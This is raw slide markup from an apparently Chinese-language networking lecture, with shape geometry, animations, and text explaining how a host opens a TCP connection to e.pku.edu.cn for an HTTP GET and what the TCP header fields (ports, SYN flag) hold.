            <p:nvSpPr>
              <p:cNvPr id="56341" name="Freeform 1125"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1544"/>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42" name="Freeform 1126"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4809" y="1544"/>
                <a:ext cx="263" cy="32"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 263"/>
                  <a:gd name="T1" fmla="*/ 32 h 32"/>
                  <a:gd name="T2" fmla="*/ 31 w 263"/>
                  <a:gd name="T3" fmla="*/ 0 h 32"/>
                  <a:gd name="T4" fmla="*/ 232 w 263"/>
                  <a:gd name="T5" fmla="*/ 0 h 32"/>
                  <a:gd name="T6" fmla="*/ 263 w 263"/>
                  <a:gd name="T7" fmla="*/ 32 h 32"/>
                  <a:gd name="T8" fmla="*/ 0 w 263"/>
                  <a:gd name="T9" fmla="*/ 32 h 32"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 263"/>
                  <a:gd name="T16" fmla="*/ 0 h 32"/>
                  <a:gd name="T17" fmla="*/ 263 w 263"/>
                  <a:gd name="T18" fmla="*/ 32 h 32"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="263" h="32">
                    <a:moveTo>
                      <a:pt x="0" y="32"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="31" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="232" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="263" y="32"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="3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43" name="Freeform 1127"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1376"/>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44" name="Freeform 1128"/>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1376"/>
                <a:ext cx="185" cy="22"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 0 w 185"/>
                  <a:gd name="T1" fmla="*/ 22 h 22"/>
                  <a:gd name="T2" fmla="*/ 22 w 185"/>
                  <a:gd name="T3" fmla="*/ 0 h 22"/>
                  <a:gd name="T4" fmla="*/ 163 w 185"/>
                  <a:gd name="T5" fmla="*/ 0 h 22"/>
                  <a:gd name="T6" fmla="*/ 185 w 185"/>
                  <a:gd name="T7" fmla="*/ 22 h 22"/>
                  <a:gd name="T8" fmla="*/ 0 w 185"/>
                  <a:gd name="T9" fmla="*/ 22 h 22"/>
                  <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                  <a:gd name="T15" fmla="*/ 0 w 185"/>
                  <a:gd name="T16" fmla="*/ 0 h 22"/>
                  <a:gd name="T17" fmla="*/ 185 w 185"/>
                  <a:gd name="T18" fmla="*/ 22 h 22"/>
                </a:gdLst>
                <a:ahLst/>
                <a:cxnLst>
                  <a:cxn ang="T10">
                    <a:pos x="T0" y="T1"/>
                  </a:cxn>
                  <a:cxn ang="T11">
                    <a:pos x="T2" y="T3"/>
                  </a:cxn>
                  <a:cxn ang="T12">
                    <a:pos x="T4" y="T5"/>
                  </a:cxn>
                  <a:cxn ang="T13">
                    <a:pos x="T6" y="T7"/>
                  </a:cxn>
                  <a:cxn ang="T14">
                    <a:pos x="T8" y="T9"/>
                  </a:cxn>
                </a:cxnLst>
                <a:rect l="T15" t="T16" r="T17" b="T18"/>
                <a:pathLst>
                  <a:path w="185" h="22">
                    <a:moveTo>
                      <a:pt x="0" y="22"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="22" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="163" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="185" y="22"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="22"/>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45" name="Rectangle 1129"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4849" y="1398"/>
                <a:ext cx="185" cy="164"/>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46" name="Rectangle 1130"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4811" y="1574"/>
                <a:ext cx="261" cy="73"/>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47" name="Rectangle 1131"/>
              <p:cNvSpPr>
                <a:spLocks noChangeArrowheads="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4866" y="1417"/>
                <a:ext cx="151"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sp>
            <p:nvSpPr>
              <p:cNvPr id="56348" name="Line 1132"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm flipH="1">
                <a:off x="4990" y="1602"/>
                <a:ext cx="61"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6349" name="Group 1133"/>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr bwMode="auto">
              <a:xfrm>
                <a:off x="4803" y="1653"/>
                <a:ext cx="277" cy="48"/>
                <a:chOff x="4803" y="1653"/>
                <a:chExt cx="277" cy="48"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:sp>
              <p:nvSpPr>
                <p:cNvPr id="56350" name="Freeform 1134"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4803" y="1653"/>
                  <a:ext cx="277" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 277"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 32 w 277"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 245 w 277"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 277 w 277"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 277"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 277"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 277 w 277"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="277" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="245" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="277" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>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1" name="Freeform 1135"/>
                <p:cNvSpPr/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4803" y="1653"/>
                  <a:ext cx="277" cy="36"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 277"/>
                    <a:gd name="T1" fmla="*/ 36 h 36"/>
                    <a:gd name="T2" fmla="*/ 32 w 277"/>
                    <a:gd name="T3" fmla="*/ 0 h 36"/>
                    <a:gd name="T4" fmla="*/ 245 w 277"/>
                    <a:gd name="T5" fmla="*/ 0 h 36"/>
                    <a:gd name="T6" fmla="*/ 277 w 277"/>
                    <a:gd name="T7" fmla="*/ 36 h 36"/>
                    <a:gd name="T8" fmla="*/ 0 w 277"/>
                    <a:gd name="T9" fmla="*/ 36 h 36"/>
                    <a:gd name="T10" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T11" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T12" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T13" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T14" fmla="*/ 0 60000 65536"/>
                    <a:gd name="T15" fmla="*/ 0 w 277"/>
                    <a:gd name="T16" fmla="*/ 0 h 36"/>
                    <a:gd name="T17" fmla="*/ 277 w 277"/>
                    <a:gd name="T18" fmla="*/ 36 h 36"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="T10">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="T11">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="T12">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="T13">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="T14">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="T15" t="T16" r="T17" b="T18"/>
                  <a:pathLst>
                    <a:path w="277" h="36">
                      <a:moveTo>
                        <a:pt x="0" y="36"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="32" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="245" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="277" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>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352" name="Rectangle 1136"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="4804" y="1687"/>
                  <a:ext cx="275"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endParaRPr lang="zh-CN" altLang="en-US"/>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56328" name="Line 1137"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2057400" y="2438400"/>
            <a:ext cx="381000"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6329" name="Line 1138"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="7696200" y="2209800"/>
            <a:ext cx="228600" cy="7620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6330" name="Line 1139"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4038600" y="2438400"/>
            <a:ext cx="381000" cy="15240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6331" name="Line 1140"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm flipH="1">
            <a:off x="4876800" y="2514600"/>
            <a:ext cx="381000" cy="7620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pic>
        <p:nvPicPr>
          <p:cNvPr id="212085" name="Picture 1141" descr="http请求"/>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3200400"/>
            <a:ext cx="74676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086" name="Text Box 1142"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5791200" y="4572000"/>
            <a:ext cx="3124200" cy="406400"/>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en-US" altLang="zh-CN" sz="2000">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>GET HTTP://e.pku.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="2000">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212087" name="Text Box 1143"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3886200" y="4572000"/>
            <a:ext cx="1905000" cy="406400"/>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212088" name="Text Box 1144"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2133600" y="4572000"/>
            <a:ext cx="1752600" cy="406400"/>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212089" name="Text Box 1145"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="152400" y="4572000"/>
            <a:ext cx="1981200" cy="406400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFC0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sp>
        <p:nvSpPr>
          <p:cNvPr id="56337" name="Text Box 1146"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="228600" y="2225675"/>
            <a:ext cx="1536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solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>您的主机：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>202.196.53.8</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="56338" name="Text Box 1147"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7223125" y="2667000"/>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solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>e.pku.edu.cn</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:solidFill>
                <a:srgbClr val="00B050"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"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20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20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20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20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2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86" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="212087" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="212088" grpId="0" animBg="1" autoUpdateAnimBg="0"/>
      <p:bldP spid="212089"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smtClean="0"/>
              <a:t>建立</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>连接</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="212995" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="5181600"/>
            <a:ext cx="7772400" cy="950913"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>要访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>e.pku.edu.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>上的数据，必须首先和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>e.pku.edu.cn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>服务器建立起连接。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="57348" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2362200"/>
            <a:ext cx="5638800" cy="406400"/>
            <a:chOff x="480" y="1488"/>
            <a:chExt cx="3552" cy="256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="57350" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1488"/>
              <a:ext cx="1200" cy="256"/>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57351" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="1104" cy="256"/>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57352" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="1488"/>
              <a:ext cx="1248" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FF99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grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="213000" name="Picture 8" descr="SY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2819400"/>
            <a:ext cx="431165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3000"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="213000"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2130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utoUpdateAnimBg="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smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214019" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1182688" y="4876800"/>
            <a:ext cx="7772400" cy="1255713"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>包头部分包括源端口、目的端口、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>标志、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" smtClean="0"/>
              <a:t>TCP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>选项等内容。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" smtClean="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="58372" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="762000" y="2362200"/>
            <a:ext cx="5638800" cy="406400"/>
            <a:chOff x="480" y="1488"/>
            <a:chExt cx="3552" cy="256"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="58376" name="Text Box 5"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2832" y="1488"/>
              <a:ext cx="1200" cy="256"/>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58377" name="Text Box 6"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1728" y="1488"/>
              <a:ext cx="1104" cy="256"/>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58378" name="Text Box 7"/>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="480" y="1488"/>
              <a:ext cx="1248" cy="256"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="FFC0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grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214024" name="Text Box 8"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2286000" y="3429000"/>
            <a:ext cx="21336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源端口：4039</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214025" name="Text Box 9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4419600" y="3429000"/>
            <a:ext cx="21336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目的端口：80</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="214026" name="Text Box 10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6553200" y="3429000"/>
            <a:ext cx="1914525" cy="466725"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="bg1"/>
          </a:solidFill>
          <a:ln w="9525">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
          </a:ln>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en-US" altLang="zh-CN">
                <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FLAGS：SYN</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN">
              <a:latin typeface="Tahoma"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4024"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="13" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="214024"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="1+#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="14" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2140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4025"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="19" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="214025"/>
                                        </p:tgtEl>
